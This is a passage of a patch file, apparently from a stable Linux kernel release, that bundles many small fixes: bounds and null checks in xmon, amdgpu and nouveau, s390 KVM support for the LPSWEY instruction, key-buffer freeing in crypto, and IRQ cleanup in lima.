+ 	}
+ 	termch = cpu;
+ 
+-	if (!scanhex(&cpu)) {
++	if (!scanhex(&cpu) || cpu >= num_possible_cpus()) {
+ 		/* print cpus waiting or in xmon */
+ 		printf("cpus stopped:");
+ 		last_cpu = first_cpu = NR_CPUS;
+@@ -2776,7 +2776,7 @@ static void dump_pacas(void)
+ 
+ 	termch = c;	/* Put c back, it wasn't 'a' */
+ 
+-	if (scanhex(&num))
++	if (scanhex(&num) && num < num_possible_cpus())
+ 		dump_one_paca(num);
+ 	else
+ 		dump_one_paca(xmon_owner);
+@@ -2849,7 +2849,7 @@ static void dump_xives(void)
+ 
+ 	termch = c;	/* Put c back, it wasn't 'a' */
+ 
+-	if (scanhex(&num))
++	if (scanhex(&num) && num < num_possible_cpus())
+ 		dump_one_xive(num);
+ 	else
+ 		dump_one_xive(xmon_owner);
+diff --git a/arch/riscv/kernel/machine_kexec.c b/arch/riscv/kernel/machine_kexec.c
+index 2d139b724bc84..ccb0c5d5c63c4 100644
+--- a/arch/riscv/kernel/machine_kexec.c
++++ b/arch/riscv/kernel/machine_kexec.c
+@@ -147,20 +147,12 @@ static void machine_kexec_mask_interrupts(void)
+ 
+ 	for_each_irq_desc(i, desc) {
+ 		struct irq_chip *chip;
+-		int ret;
+ 
+ 		chip = irq_desc_get_chip(desc);
+ 		if (!chip)
+ 			continue;
+ 
+-		/*
+-		 * First try to remove the active state. If this
+-		 * fails, try to EOI the interrupt.
+-		 */
+-		ret = irq_set_irqchip_state(i, IRQCHIP_STATE_ACTIVE, false);
+-
+-		if (ret && irqd_irq_inprogress(&desc->irq_data) &&
+-		    chip->irq_eoi)
++		if (chip->irq_eoi && irqd_irq_inprogress(&desc->irq_data))
+ 			chip->irq_eoi(&desc->irq_data);
+ 
+ 		if (chip->irq_mask)
+diff --git a/arch/s390/include/asm/kvm_host.h b/arch/s390/include/asm/kvm_host.h
+index 09abf000359f8..0ef662fbade0d 100644
+--- a/arch/s390/include/asm/kvm_host.h
++++ b/arch/s390/include/asm/kvm_host.h
+@@ -427,6 +427,7 @@ struct kvm_vcpu_stat {
+ 	u64 instruction_io_other;
+ 	u64 instruction_lpsw;
+ 	u64 instruction_lpswe;
++	u64 instruction_lpswey;
+ 	u64 instruction_pfmf;
+ 	u64 instruction_ptff;
+ 	u64 instruction_sck;
+diff --git a/arch/s390/kvm/kvm-s390.c b/arch/s390/kvm/kvm-s390.c
+index 348d49268a7ec..e6606ff91921a 100644
+--- a/arch/s390/kvm/kvm-s390.c
++++ b/arch/s390/kvm/kvm-s390.c
+@@ -132,6 +132,7 @@ const struct _kvm_stats_desc kvm_vcpu_stats_desc[] = {
+ 	STATS_DESC_COUNTER(VCPU, instruction_io_other),
+ 	STATS_DESC_COUNTER(VCPU, instruction_lpsw),
+ 	STATS_DESC_COUNTER(VCPU, instruction_lpswe),
++	STATS_DESC_COUNTER(VCPU, instruction_lpswey),
+ 	STATS_DESC_COUNTER(VCPU, instruction_pfmf),
+ 	STATS_DESC_COUNTER(VCPU, instruction_ptff),
+ 	STATS_DESC_COUNTER(VCPU, instruction_sck),
+diff --git a/arch/s390/kvm/kvm-s390.h b/arch/s390/kvm/kvm-s390.h
+index 4755492dfabc6..bb8d1a050b669 100644
+--- a/arch/s390/kvm/kvm-s390.h
++++ b/arch/s390/kvm/kvm-s390.h
+@@ -119,6 +119,21 @@ static inline u64 kvm_s390_get_base_disp_s(struct kvm_vcpu *vcpu, u8 *ar)
+ 	return (base2 ? vcpu->run->s.regs.gprs[base2] : 0) + disp2;
+ }
+ 
++static inline u64 kvm_s390_get_base_disp_siy(struct kvm_vcpu *vcpu, u8 *ar)
++{
++	u32 base1 = vcpu->arch.sie_block->ipb >> 28;
++	s64 disp1;
++
++	/* The displacement is a 20bit _SIGNED_ value */
++	disp1 = sign_extend64(((vcpu->arch.sie_block->ipb & 0x0fff0000) >> 16) +
++			      ((vcpu->arch.sie_block->ipb & 0xff00) << 4), 19);
++
++	if (ar)
++		*ar = base1;
++
++	return (base1 ? vcpu->run->s.regs.gprs[base1] : 0) + disp1;
++}
++
+ static inline void kvm_s390_get_base_disp_sse(struct kvm_vcpu *vcpu,
+ 					      u64 *address1, u64 *address2,
+ 					      u8 *ar_b1, u8 *ar_b2)
+diff --git a/arch/s390/kvm/priv.c b/arch/s390/kvm/priv.c
+index 3335fa09b6f1d..9af826d093efc 100644
+--- a/arch/s390/kvm/priv.c
++++ b/arch/s390/kvm/priv.c
+@@ -794,6 +794,36 @@ static int handle_lpswe(struct kvm_vcpu *vcpu)
+ 	return 0;
+ }
+ 
++static int handle_lpswey(struct kvm_vcpu *vcpu)
++{
++	psw_t new_psw;
++	u64 addr;
++	int rc;
++	u8 ar;
++
++	vcpu->stat.instruction_lpswey++;
++
++	if (!test_kvm_facility(vcpu->kvm, 193))
++		return kvm_s390_inject_program_int(vcpu, PGM_OPERATION);
++
++	if (vcpu->arch.sie_block->gpsw.mask & PSW_MASK_PSTATE)
++		return kvm_s390_inject_program_int(vcpu, PGM_PRIVILEGED_OP);
++
++	addr = kvm_s390_get_base_disp_siy(vcpu, &ar);
++	if (addr & 7)
++		return kvm_s390_inject_program_int(vcpu, PGM_SPECIFICATION);
++
++	rc = read_guest(vcpu, addr, ar, &new_psw, sizeof(new_psw));
++	if (rc)
++		return kvm_s390_inject_prog_cond(vcpu, rc);
++
++	vcpu->arch.sie_block->gpsw = new_psw;
++	if (!is_valid_psw(&vcpu->arch.sie_block->gpsw))
++		return kvm_s390_inject_program_int(vcpu, PGM_SPECIFICATION);
++
++	return 0;
++}
++
+ static int handle_stidp(struct kvm_vcpu *vcpu)
+ {
+ 	u64 stidp_data = vcpu->kvm->arch.model.cpuid;
+@@ -1460,6 +1490,8 @@ int kvm_s390_handle_eb(struct kvm_vcpu *vcpu)
+ 	case 0x61:
+ 	case 0x62:
+ 		return handle_ri(vcpu);
++	case 0x71:
++		return handle_lpswey(vcpu);
+ 	default:
+ 		return -EOPNOTSUPP;
+ 	}
+diff --git a/crypto/aead.c b/crypto/aead.c
+index 16991095270d2..c4ece86c45bc4 100644
+--- a/crypto/aead.c
++++ b/crypto/aead.c
+@@ -35,8 +35,7 @@ static int setkey_unaligned(struct crypto_aead *tfm, const u8 *key,
+ 	alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
+ 	memcpy(alignbuffer, key, keylen);
+ 	ret = crypto_aead_alg(tfm)->setkey(tfm, alignbuffer, keylen);
+-	memset(alignbuffer, 0, keylen);
+-	kfree(buffer);
++	kfree_sensitive(buffer);
+ 	return ret;
+ }
+ 
+diff --git a/crypto/cipher.c b/crypto/cipher.c
+index b47141ed4a9f3..395f0c2fbb9ff 100644
+--- a/crypto/cipher.c
++++ b/crypto/cipher.c
+@@ -34,8 +34,7 @@ static int setkey_unaligned(struct crypto_cipher *tfm, const u8 *key,
+ 	alignbuffer = (u8 *)ALIGN((unsigned long)buffer, alignmask + 1);
+ 	memcpy(alignbuffer, key, keylen);
+ 	ret = cia->cia_setkey(crypto_cipher_tfm(tfm), alignbuffer, keylen);
+-	memset(alignbuffer, 0, keylen);
+-	kfree(buffer);
++	kfree_sensitive(buffer);
+ 	return ret;
+ 
+ }
+diff --git a/drivers/base/regmap/regmap-i2c.c b/drivers/base/regmap/regmap-i2c.c
+index 3ec611dc0c09f..a905e955bbfc7 100644
+--- a/drivers/base/regmap/regmap-i2c.c
++++ b/drivers/base/regmap/regmap-i2c.c
+@@ -350,7 +350,8 @@ static const struct regmap_bus *regmap_get_i2c_bus(struct i2c_client *i2c,
+ 
+ 		if (quirks->max_write_len &&
+ 		    (bus->max_raw_write == 0 || bus->max_raw_write > quirks->max_write_len))
+-			max_write = quirks->max_write_len;
++			max_write = quirks->max_write_len -
++				(config->reg_bits + config->pad_bits) / BITS_PER_BYTE;
+ 
+ 		if (max_read || max_write) {
+ 			ret_bus = kmemdup(bus, sizeof(*bus), GFP_KERNEL);
+diff --git a/drivers/block/null_blk/zoned.c b/drivers/block/null_blk/zoned.c
+index b0264b3df6f3d..206c2a7a5100e 100644
+--- a/drivers/block/null_blk/zoned.c
++++ b/drivers/block/null_blk/zoned.c
+@@ -83,6 +83,17 @@ int null_init_zoned_dev(struct nullb_device *dev, struct request_queue *q)
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * If a smaller zone capacity was requested, do not allow a smaller last
++	 * zone at the same time as such zone configuration does not correspond
++	 * to any real zoned device.
++	 */
++	if (dev->zone_capacity != dev->zone_size &&
++	    dev->size & (dev->zone_size - 1)) {
++		pr_err("A smaller last zone is not allowed with zone capacity smaller than zone size.\n");
++		return -EINVAL;
++	}
++
+ 	zone_capacity_sects = mb_to_sects(dev->zone_capacity);
+ 	dev_capacity_sects = mb_to_sects(dev->size);
+ 	dev->zone_size_sects = mb_to_sects(dev->zone_size);
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 070014d0fc994..4fddb4666d54e 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2385,15 +2385,27 @@ static void qca_serdev_shutdown(struct device *dev)
+ 	struct qca_serdev *qcadev = serdev_device_get_drvdata(serdev);
+ 	struct hci_uart *hu = &qcadev->serdev_hu;
+ 	struct hci_dev *hdev = hu->hdev;
+-	struct qca_data *qca = hu->priv;
+ 	const u8 ibs_wake_cmd[] = { 0xFD };
+ 	const u8 edl_reset_soc_cmd[] = { 0x01, 0x00, 0xFC, 0x01, 0x05 };
+ 
+ 	if (qcadev->btsoc_type == QCA_QCA6390) {
+-		if (test_bit(QCA_BT_OFF, &qca->flags) ||
+-		    !test_bit(HCI_RUNNING, &hdev->flags))
++		/* The purpose of sending the VSC is to reset SOC into a initial
++		 * state and the state will ensure next hdev->setup() success.
++		 * if HCI_QUIRK_NON_PERSISTENT_SETUP is set, it means that
++		 * hdev->setup() can do its job regardless of SoC state, so
++		 * don't need to send the VSC.
++		 * if HCI_SETUP is set, it means that hdev->setup() was never
++		 * invoked and the SOC is already in the initial state, so
++		 * don't also need to send the VSC.
++		 */
++		if (test_bit(HCI_QUIRK_NON_PERSISTENT_SETUP, &hdev->quirks) ||
++		    hci_dev_test_flag(hdev, HCI_SETUP))
+ 			return;
+ 
++		/* The serdev must be in open state when conrol logic arrives
++		 * here, so also fix the use-after-free issue caused by that
++		 * the serdev is flushed or wrote after it is closed.
++		 */
+ 		serdev_device_write_flush(serdev);
+ 		ret = serdev_device_write_buf(serdev, ibs_wake_cmd,
+ 					      sizeof(ibs_wake_cmd));
+diff --git a/drivers/cdrom/cdrom.c b/drivers/cdrom/cdrom.c
+index 416f723a2dbb3..8e3eeb96db63e 100644
+--- a/drivers/cdrom/cdrom.c
++++ b/drivers/cdrom/cdrom.c
+@@ -2372,7 +2372,7 @@ static int cdrom_ioctl_timed_media_change(struct cdrom_device_info *cdi,
+ 		return -EFAULT;
+ 
+ 	tmp_info.media_flags = 0;
+-	if (tmp_info.last_media_change - cdi->last_media_change_ms < 0)
++	if (cdi->last_media_change_ms > tmp_info.last_media_change)
+ 		tmp_info.media_flags |= MEDIA_CHANGED_FLAG;
+ 
+ 	tmp_info.last_media_change = cdi->last_media_change_ms;
+diff --git a/drivers/clk/mediatek/clk-mt8183-mfgcfg.c b/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
+index 730c9ae5ea124..50ccd59794464 100644
+--- a/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
++++ b/drivers/clk/mediatek/clk-mt8183-mfgcfg.c
+@@ -29,6 +29,7 @@ static const struct mtk_gate mfg_clks[] = {
+ static const struct mtk_clk_desc mfg_desc = {
+ 	.clks = mfg_clks,
+ 	.num_clks = ARRAY_SIZE(mfg_clks),
++	.need_runtime_pm = true,
+ };
+ 
+ static const struct of_device_id of_match_clk_mt8183_mfg[] = {
+diff --git a/drivers/clk/mediatek/clk-mtk.c b/drivers/clk/mediatek/clk-mtk.c
+index fa2c1b1c7dee4..9dbfc11d5c591 100644
+--- a/drivers/clk/mediatek/clk-mtk.c
++++ b/drivers/clk/mediatek/clk-mtk.c
+@@ -472,14 +472,16 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	}
+ 
+ 
+-	devm_pm_runtime_enable(&pdev->dev);
+-	/*
+-	 * Do a pm_runtime_resume_and_get() to workaround a possible
+-	 * deadlock between clk_register() and the genpd framework.
+-	 */
+-	r = pm_runtime_resume_and_get(&pdev->dev);
+-	if (r)
+-		return r;
++	if (mcd->need_runtime_pm) {
++		devm_pm_runtime_enable(&pdev->dev);
++		/*
++		 * Do a pm_runtime_resume_and_get() to workaround a possible
++		 * deadlock between clk_register() and the genpd framework.
++		 */
++		r = pm_runtime_resume_and_get(&pdev->dev);
++		if (r)
++			return r;
++	}
+ 
+ 	/* Calculate how many clk_hw_onecell_data entries to allocate */
+ 	num_clks = mcd->num_clks + mcd->num_composite_clks;
+@@ -529,6 +531,14 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_composites;
+ 	}
+ 
++	if (mcd->clk_notifier_func) {
++		struct clk *mfg_mux = clk_data->hws[mcd->mfg_clk_idx]->clk;
++
++		r = mcd->clk_notifier_func(&pdev->dev, mfg_mux);
++		if (r)
++			goto unregister_clks;
++	}
++
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+ 		goto unregister_clks;
+@@ -542,7 +552,8 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 			goto unregister_clks;
+ 	}
+ 
+-	pm_runtime_put(&pdev->dev);
++	if (mcd->need_runtime_pm)
++		pm_runtime_put(&pdev->dev);
+ 
+ 	return r;
+ 
+@@ -570,7 +581,8 @@ int mtk_clk_simple_probe(struct platform_device *pdev)
+ 	if (mcd->shared_io && base)
+ 		iounmap(base);
+ 
+-	pm_runtime_put(&pdev->dev);
++	if (mcd->need_runtime_pm)
++		pm_runtime_put(&pdev->dev);
+ 	return r;
+ }
+ EXPORT_SYMBOL_GPL(mtk_clk_simple_probe);
+diff --git a/drivers/clk/mediatek/clk-mtk.h b/drivers/clk/mediatek/clk-mtk.h
+index 880b3d6d80119..65c24ab6c9470 100644
+--- a/drivers/clk/mediatek/clk-mtk.h
++++ b/drivers/clk/mediatek/clk-mtk.h
+@@ -207,6 +207,11 @@ struct mtk_clk_desc {
+ 	const struct mtk_clk_rst_desc *rst_desc;
+ 	spinlock_t *clk_lock;
+ 	bool shared_io;
++
++	int (*clk_notifier_func)(struct device *dev, struct clk *clk);
++	unsigned int mfg_clk_idx;
++
++	bool need_runtime_pm;
+ };
+ 
+ int mtk_clk_simple_probe(struct platform_device *pdev);
+diff --git a/drivers/clk/qcom/gcc-sm6350.c b/drivers/clk/qcom/gcc-sm6350.c
+index cf4a7b6e0b23a..0559a33faf00e 100644
+--- a/drivers/clk/qcom/gcc-sm6350.c
++++ b/drivers/clk/qcom/gcc-sm6350.c
+@@ -100,8 +100,8 @@ static struct clk_alpha_pll gpll6 = {
+ 		.enable_mask = BIT(6),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpll6",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&gpll0.clkr.hw,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+ 			.ops = &clk_alpha_pll_fixed_fabia_ops,
+@@ -124,7 +124,7 @@ static struct clk_alpha_pll_postdiv gpll6_out_even = {
+ 	.clkr.hw.init = &(struct clk_init_data){
+ 		.name = "gpll6_out_even",
+ 		.parent_hws = (const struct clk_hw*[]){
+-			&gpll0.clkr.hw,
++			&gpll6.clkr.hw,
+ 		},
+ 		.num_parents = 1,
+ 		.ops = &clk_alpha_pll_postdiv_fabia_ops,
+@@ -139,8 +139,8 @@ static struct clk_alpha_pll gpll7 = {
+ 		.enable_mask = BIT(7),
+ 		.hw.init = &(struct clk_init_data){
+ 			.name = "gpll7",
+-			.parent_hws = (const struct clk_hw*[]){
+-				&gpll0.clkr.hw,
++			.parent_data = &(const struct clk_parent_data){
++				.fw_name = "bi_tcxo",
+ 			},
+ 			.num_parents = 1,
+ 			.ops = &clk_alpha_pll_fixed_fabia_ops,
+diff --git a/drivers/crypto/hisilicon/debugfs.c b/drivers/crypto/hisilicon/debugfs.c
+index 13bec8b2d7237..a1d41ee39816b 100644
+--- a/drivers/crypto/hisilicon/debugfs.c
++++ b/drivers/crypto/hisilicon/debugfs.c
+@@ -744,8 +744,14 @@ static void dfx_regs_uninit(struct hisi_qm *qm,
+ {
+ 	int i;
+ 
++	if (!dregs)
++		return;
++
+ 	/* Setting the pointer is NULL to prevent double free */
+ 	for (i = 0; i < reg_len; i++) {
++		if (!dregs[i].regs)
++			continue;
++
+ 		kfree(dregs[i].regs);
+ 		dregs[i].regs = NULL;
+ 	}
+@@ -795,14 +801,21 @@ static struct dfx_diff_registers *dfx_regs_init(struct hisi_qm *qm,
+ static int qm_diff_regs_init(struct hisi_qm *qm,
+ 		struct dfx_diff_registers *dregs, u32 reg_len)
+ {
++	int ret;
++
+ 	qm->debug.qm_diff_regs = dfx_regs_init(qm, qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-	if (IS_ERR(qm->debug.qm_diff_regs))
+-		return PTR_ERR(qm->debug.qm_diff_regs);
++	if (IS_ERR(qm->debug.qm_diff_regs)) {
++		ret = PTR_ERR(qm->debug.qm_diff_regs);
++		qm->debug.qm_diff_regs = NULL;
++		return ret;
++	}
+ 
+ 	qm->debug.acc_diff_regs = dfx_regs_init(qm, dregs, reg_len);
+ 	if (IS_ERR(qm->debug.acc_diff_regs)) {
+ 		dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
+-		return PTR_ERR(qm->debug.acc_diff_regs);
++		ret = PTR_ERR(qm->debug.acc_diff_regs);
++		qm->debug.acc_diff_regs = NULL;
++		return ret;
+ 	}
+ 
+ 	return 0;
+@@ -843,7 +856,9 @@ static int qm_last_regs_init(struct hisi_qm *qm)
+ static void qm_diff_regs_uninit(struct hisi_qm *qm, u32 reg_len)
+ {
+ 	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
++	qm->debug.acc_diff_regs = NULL;
+ 	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++	qm->debug.qm_diff_regs = NULL;
+ }
+ 
+ /**
+diff --git a/drivers/firmware/dmi_scan.c b/drivers/firmware/dmi_scan.c
+index 015c95a825d31..ac2a5d2d47463 100644
+--- a/drivers/firmware/dmi_scan.c
++++ b/drivers/firmware/dmi_scan.c
+@@ -101,6 +101,17 @@ static void dmi_decode_table(u8 *buf,
+ 	       (data - buf + sizeof(struct dmi_header)) <= dmi_len) {
+ 		const struct dmi_header *dm = (const struct dmi_header *)data;
+ 
++		/*
++		 * If a short entry is found (less than 4 bytes), not only it
++		 * is invalid, but we cannot reliably locate the next entry.
++		 */
++		if (dm->length < sizeof(struct dmi_header)) {
++			pr_warn(FW_BUG
++				"Corrupted DMI table, offset %zd (only %d entries processed)\n",
++				data - buf, i);
++			break;
++		}
++
+ 		/*
+ 		 *  We want to know the total length (formatted area and
+ 		 *  strings) before decoding to make sure we won't run off the
+diff --git a/drivers/gpu/drm/amd/amdgpu/aldebaran.c b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+index fa6193535d485..7fea4f0f495a3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/aldebaran.c
++++ b/drivers/gpu/drm/amd/amdgpu/aldebaran.c
+@@ -100,7 +100,7 @@ static int aldebaran_mode2_suspend_ip(struct amdgpu_device *adev)
+ 		adev->ip_blocks[i].status.hw = false;
+ 	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+index b803e785d3aff..e9e0e7328c4e1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_gfx.c
+@@ -1004,7 +1004,8 @@ void amdgpu_gfx_cp_init_microcode(struct amdgpu_device *adev,
+ 		fw_size = le32_to_cpu(cp_hdr_v2_0->data_size_bytes);
+ 		break;
+ 	default:
+-		break;
++		dev_err(adev->dev, "Invalid ucode id %u\n", ucode_id);
++		return;
+ 	}
+ 
+ 	if (adev->firmware.load_type == AMDGPU_FW_LOAD_PSP) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+index 9efbc0f7c6bdf..c3da333f09de4 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
+@@ -480,6 +480,14 @@ void amdgpu_irq_dispatch(struct amdgpu_device *adev,
+ 
+ 	entry.ih = ih;
+ 	entry.iv_entry = (const uint32_t *)&ih->ring[ring_index];
++
++	/*
++	 * timestamp is not supported on some legacy SOCs (cik, cz, iceland,
++	 * si and tonga), so initialize timestamp and timestamp_src to 0
++	 */
++	entry.timestamp = 0;
++	entry.timestamp_src = 0;
++
+ 	amdgpu_ih_decode_iv(adev, &entry);
+ 
+ 	trace_amdgpu_iv(ih - &adev->irq.ih, &entry);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c b/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
+index 81a6d5b94987f..1311e72486fdc 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
++++ b/drivers/gpu/drm/amd/amdgpu/sienna_cichlid.c
+@@ -93,7 +93,7 @@ static int sienna_cichlid_mode2_suspend_ip(struct amdgpu_device *adev)
+ 		adev->ip_blocks[i].status.hw = false;
+ 	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+index e2f80cd0ca8cb..83898e46bcadf 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_resource.c
+@@ -2146,6 +2146,9 @@ static struct audio *find_first_free_audio(
+ {
+ 	int i, available_audio_count;
+ 
++	if (id == ENGINE_ID_UNKNOWN)
++		return NULL;
++
+ 	available_audio_count = pool->audio_count;
+ 
+ 	for (i = 0; i < available_audio_count; i++) {
+diff --git a/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c b/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
+index 44649db5f3e32..5646b7788f02e 100644
+--- a/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
++++ b/drivers/gpu/drm/amd/display/dc/irq/dce110/irq_service_dce110.c
+@@ -211,8 +211,12 @@ bool dce110_vblank_set(struct irq_service *irq_service,
+ 						   info->ext_id);
+ 	uint8_t pipe_offset = dal_irq_src - IRQ_TYPE_VBLANK;
+ 
+-	struct timing_generator *tg =
+-			dc->current_state->res_ctx.pipe_ctx[pipe_offset].stream_res.tg;
++	struct timing_generator *tg;
++
++	if (pipe_offset >= MAX_PIPES)
++		return false;
++
++	tg = dc->current_state->res_ctx.pipe_ctx[pipe_offset].stream_res.tg;
+ 
+ 	if (enable) {
+ 		if (!tg || !tg->funcs->arm_vert_intr(tg, 2)) {
+diff --git a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+index f7b5583ee609a..8e9caae7c9559 100644
+--- a/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
++++ b/drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c
+@@ -156,6 +156,10 @@ static enum mod_hdcp_status read(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++		return MOD_HDCP_STATUS_DDC_FAILURE;
++	}
++
+ 	if (is_dp_hdcp(hdcp)) {
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+@@ -215,6 +219,10 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 	uint32_t cur_size = 0;
+ 	uint32_t data_offset = 0;
+ 
++	if (msg_id == MOD_HDCP_MESSAGE_ID_INVALID) {
++		return MOD_HDCP_STATUS_DDC_FAILURE;
++	}
++
+ 	if (is_dp_hdcp(hdcp)) {
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+diff --git a/drivers/gpu/drm/amd/include/atomfirmware.h b/drivers/gpu/drm/amd/include/atomfirmware.h
+index e2207f1c5bad3..6ea596a8a03df 100644
+--- a/drivers/gpu/drm/amd/include/atomfirmware.h
++++ b/drivers/gpu/drm/amd/include/atomfirmware.h
+@@ -701,7 +701,7 @@ struct atom_gpio_pin_lut_v2_1
+ {
+   struct  atom_common_table_header  table_header;
+   /*the real number of this included in the structure is calcualted by using the (whole structure size - the header size)/size of atom_gpio_pin_lut  */
+-  struct  atom_gpio_pin_assignment  gpio_pin[8];
++  struct  atom_gpio_pin_assignment  gpio_pin[];
+ };
+ 
+ 
+diff --git a/drivers/gpu/drm/drm_panel_orientation_quirks.c b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+index aa93129c3397e..426bbee2d9f5e 100644
+--- a/drivers/gpu/drm/drm_panel_orientation_quirks.c
++++ b/drivers/gpu/drm/drm_panel_orientation_quirks.c
+@@ -421,6 +421,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "1"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Valve Steam Deck */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Valve"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Galileo"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "1"),
++		},
++		.driver_data = (void *)&lcd800x1280_rightside_up,
+ 	}, {	/* VIOS LTH17 */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "VIOS"),
+diff --git a/drivers/gpu/drm/lima/lima_gp.c b/drivers/gpu/drm/lima/lima_gp.c
+index 6cf46b653e810..ca3842f719842 100644
+--- a/drivers/gpu/drm/lima/lima_gp.c
++++ b/drivers/gpu/drm/lima/lima_gp.c
+@@ -324,7 +324,9 @@ int lima_gp_init(struct lima_ip *ip)
+ 
+ void lima_gp_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ int lima_gp_pipe_init(struct lima_device *dev)
+diff --git a/drivers/gpu/drm/lima/lima_mmu.c b/drivers/gpu/drm/lima/lima_mmu.c
+index a1ae6c252dc2b..8ca7047adbaca 100644
+--- a/drivers/gpu/drm/lima/lima_mmu.c
++++ b/drivers/gpu/drm/lima/lima_mmu.c
+@@ -118,7 +118,12 @@ int lima_mmu_init(struct lima_ip *ip)
+ 
+ void lima_mmu_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
++
++	if (ip->id == lima_ip_ppmmu_bcast)
++		return;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ void lima_mmu_flush_tlb(struct lima_ip *ip)
+diff --git a/drivers/gpu/drm/lima/lima_pp.c b/drivers/gpu/drm/lima/lima_pp.c
+index 54b208a4a768e..d34c9e8840f45 100644
+--- a/drivers/gpu/drm/lima/lima_pp.c
++++ b/drivers/gpu/drm/lima/lima_pp.c
+@@ -266,7 +266,9 @@ int lima_pp_init(struct lima_ip *ip)
+ 
+ void lima_pp_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ int lima_pp_bcast_resume(struct lima_ip *ip)
+@@ -299,7 +301,9 @@ int lima_pp_bcast_init(struct lima_ip *ip)
+ 
+ void lima_pp_bcast_fini(struct lima_ip *ip)
+ {
++	struct lima_device *dev = ip->dev;
+ 
++	devm_free_irq(dev->dev, ip->irq, ip);
+ }
+ 
+ static int lima_pp_task_validate(struct lima_sched_pipe *pipe,
+diff --git a/drivers/gpu/drm/nouveau/nouveau_connector.c b/drivers/gpu/drm/nouveau/nouveau_connector.c
+index d6dd79541f6a9..bdf5262ebd35e 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_connector.c
++++ b/drivers/gpu/drm/nouveau/nouveau_connector.c
+@@ -980,6 +980,9 @@ nouveau_connector_get_modes(struct drm_connector *connector)
+ 		struct drm_display_mode *mode;
+ 
+ 		mode = drm_mode_duplicate(dev, nv_connector->native_mode);
++		if (!mode)
++			return 0;
++
+ 		drm_mode_probed_add(connector, mode);
+ 		ret = 1;
+ 	}
+diff --git a/drivers/i2c/busses/i2c-i801.c b/drivers/i2c/busses/i2c-i801.c
+index 1c970842624ba..208c7741bc681 100644
+--- a/drivers/i2c/busses/i2c-i801.c
++++ b/drivers/i2c/busses/i2c-i801.c
+@@ -1057,7 +1057,7 @@ static const struct pci_device_id i801_ids[] = {
+ MODULE_DEVICE_TABLE(pci, i801_ids);
+ 
+ #if defined CONFIG_X86 && defined CONFIG_DMI
+-static unsigned char apanel_addr;
++static unsigned char apanel_addr __ro_after_init;
+ 
